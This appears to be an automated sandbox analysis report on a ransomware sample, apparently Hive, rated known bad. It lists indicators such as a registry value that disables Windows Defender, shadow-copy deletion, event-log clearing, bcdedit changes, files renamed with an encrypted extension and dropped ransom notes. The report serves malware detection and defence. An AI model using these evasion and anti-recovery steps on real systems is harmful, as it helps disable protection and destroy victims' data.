Analysis Overview
SHA256
fc9d898ab0ecfb3d018440ba67cbfc5c6858a1fe98a74bc8615f143882a91a42
Threat Level: Known bad
The file fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.7z was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Modifies Windows Defender Real-time Protection settings
Hive
Modifies security service
Modifies boot configuration data using bcdedit
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Modifies registry class
Runs net.exe
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Interacts with shadow copies
Suspicious behavior: EnumeratesProcesses
Opens file in notepad (likely ransom note)
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 19:10
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 19:09
Reported
2022-01-12 19:15
Platform
win7-en-20211208
Max time kernel
160s
Max time network
126s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02356_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_sMUglmgXaOQ0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SlateBlue.css.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_xy6sHfieqqc0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\jfr\default.jfc.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_JBpz6btcXIY0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0301418.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_INoR85N0wzw0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Document.gif.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_VZhqpKGzgZk0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)greenStateIcon.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_y97lD1-8Uvw0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_Tb6T9d5ISJc0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART7.BDR.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_Ky07mdlPd-I0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_3CxjwLR3M-I0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_kWKQs3wEJo40.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01173_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_42tRPV6mNiY0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\4a7Z_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialoccasion.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212953.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_arNdJFQIkc80.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_XlYBolJFvKw0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_as443v6H82Q0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\4a7Z_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_IW6Snn9pz4o0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\fr-FR\Sidebar.exe.mui | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18210_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_AAHY4eQbWWU0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZTOOL.ACCDE.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_-1_CjL-_7EQ0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL097.XML.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_v_8pNnhTru80.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LAYERS\4a7Z_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_DHNstYy3HJY0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Juneau.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_tZY5lSVYiGA0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00382_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_LWJ4VosnqSY0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00170_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_hIgcKRu40lY0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\notes-static.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WORDREP.DPV.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_YUBnwULW9Uo0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_rest.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\security\4a7Z_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_zsivfCxq9900.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Stationery\1033\NOTEBOOK.JPG.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_wlJ5ZoLhppw0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_Rz8F7kbEc8k0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\logo.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FREN\MSB1FREN.ITS.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_O3udpGSPqBs0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\micaut.dll.mui | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_XrZ1nygenpI0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART6.BDR.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_cDeWpVK2t9U0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\4a7Z_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_5N2ddHDno1I0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_u3K8R2_vYXk0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21298_.GIF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_n_UZvscAGEE0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_K_COL.HXK.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_ztfGfJy3WBI0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_underline.gif.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_DSpVepB64QQ0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL106.XML.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_LzPPLt--dEg0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_hB4KL9VbdAk0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_4HFJrVDfK_U0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_gHZcAqbvBaw0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB_COL.HXT.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_QxUfmxq-SE00.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME35.CSS.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_yKzWWKw1EKI0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_GCIQHn1N-gU0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187861.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_oAySEKdt7dI0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert.css.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_UOCicoHhpAw0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
